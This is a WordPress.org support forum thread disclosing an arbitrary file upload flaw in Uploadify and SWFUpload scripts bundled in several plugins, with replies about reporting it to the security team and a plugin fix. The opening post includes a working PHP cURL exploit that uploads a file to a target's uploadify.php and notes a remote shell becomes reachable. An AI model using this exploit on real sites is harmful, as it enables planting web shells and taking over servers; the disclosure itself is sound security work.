WordPress.org

Support

Support » Plugins and Hacks » UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD

UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD

  • In all plugins that contains this lib :

    -> js/swfupdate/js/upload.php
    -> upload/php.php
    -> includes/doajaxfileupload.php
    -> uploadify/uploadify.php

    and more…

    Ex vuln plugins :

    -> front-end-upload
    -> front-file-manager
    -> omni-secure-files

    Ex vuln code :

    <?php
    /**
     * upload.php
     *
     * Copyright 2009, Moxiecode Systems AB
     * Released under GPL License.
     *
     * License: http://www.plupload.com/license
     * Contributing: http://www.plupload.com/contributing
     */
    
    // HTTP headers for no cache etc
    header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
    header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Cache-Control: post-check=0, pre-check=0", false);
    header("Pragma: no-cache");
    
    // we need these WP files to grab our destination dir
    ob_start();
    require_once( preg_replace( "/wp-content.*/","wp-load.php", __FILE__ ) );
    require_once( preg_replace( "/wp-content.*/","/wp-admin/includes/admin.php", __FILE__ ) );
    ob_end_clean();
    
    // Settings
    //$targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";
    $targetDir = FEU_DESTINATION_DIR;
    [...]

    exploits code :

    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
    $c = curl_init("http://site.com/PLUGIN-NAME/uploads/uploadify.php");
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$u"));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e;
    ?>

    Remote shell “shell.php” is accessible from folder upload or temp.

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator Jan Dembowski

    @jdembowski

    Brute Squad and Volunteer Moderator

    I’ve not been able to locate those plugins (I blame a lack of sleep).

    If that’s from plugins that’s hosted in the WordPress repository can you email the details of which plugins AT wordpress.org or security AT wordpress.org?

    As with other vulnerable software (think timthumb) that’s a very serious issue.

    I just sent you a mail

    Moderator Jan Dembowski

    @jdembowski

    Brute Squad and Volunteer Moderator

    It’s not me as I’m not on either of those teams, but thank you. Informing the correct people is appreciated. 😉

    Sure

    Lot’s of most-used plugins are concerned (> 100)

    I’ve updated Front End Upload to close this issue with that plugin.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD’ is closed to new replies.
Skip to toolbar